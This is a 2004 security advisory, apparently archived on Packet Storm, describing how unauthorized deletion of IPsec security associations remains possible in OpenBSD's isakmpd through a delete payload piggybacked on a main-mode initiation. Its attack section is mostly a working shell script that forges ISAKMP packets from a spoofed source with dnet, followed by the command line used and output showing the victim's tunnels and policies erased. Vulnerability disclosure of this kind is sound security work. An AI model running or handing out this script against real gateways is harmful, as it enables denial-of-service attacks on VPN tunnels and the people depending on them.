exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

isakmpdAgain.txt

isakmpdAgain.txt
Posted Jun 10, 2004
Authored by Thomas Walpuski

Unauthorized deletion of IPsec SAs is still possible using a delete payload piggybacked on an initiation of main mode with the latest version of isakmpd.

tags | advisory
SHA-256 | c5d443ed4065bde5c240457b08dcb81606ea790ee65250147c49eddf9744dc54

isakmpdAgain.txt

Change Mirror Download
1 Abstract

For nearly 10 months a handful of OpenBSD-developers is trying to fix
a plethora of payload handling flaws in isakmpd. On 2004/01/13 they
released something like a final patch to a broader public. The patch
protects against some specific attacks, but does not solve the
problem.

2 Description

Unauthorized deletion of IPsec SAs is still possible using a delete
payload piggybacked on a initiation of main mode.

For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

All (recent) versions of isakmpd are affected. The attack has been
successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

Here we go. There is an IPsec tunnel between sg-a and sg-b:

sg-a# cat /kern/ipsec | grep SPI
SPI = 97e49ca2, Destination = <sg-a's IP address>, Sproto = 50
SPI = 901e38d9, Destination = <sg-b's IP address>, Sproto = 50

The attacker built some little script, because this time he wants to
shoot down a bunch of IPsec SAs:

attacker# cat during_these_hostile_and_trying_times_and_what-not
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 <faked-src> <victim> <spi>";
exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
$cky_i \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x01\x10\x02\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x58" \
"\x0c\x00\x00\x2c" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x20" \
"\x01\x01\x00\x01" \
"\x00\x00\x00\x18" \
"\x00\x01\x00\x00" \
"\x80\x01\x00\x05" \
"\x80\x02\x00\x02" \
"\x80\x03\x00\x01" \
"\x80\x04\x00\x02" \
"\x00\x00\x00\x10" \
"\x00\x00\x00\x01" \
"\x03\x04\x00\x01" \
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send

He fires up his script with appropriate parameters:

attacker# ./during_these_hostile_and_trying_times_and_what-not \
> sg-b sg-a 901e38d9

And the victim's IPsec SAs _and_ policies fade away almost
instantaneous:

sg-a# cat /kern/ipsec
Hashmask: 31, policy entries: 0

5 Solution?

There are no bug fixes, yet.

Thomas Walpuski
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close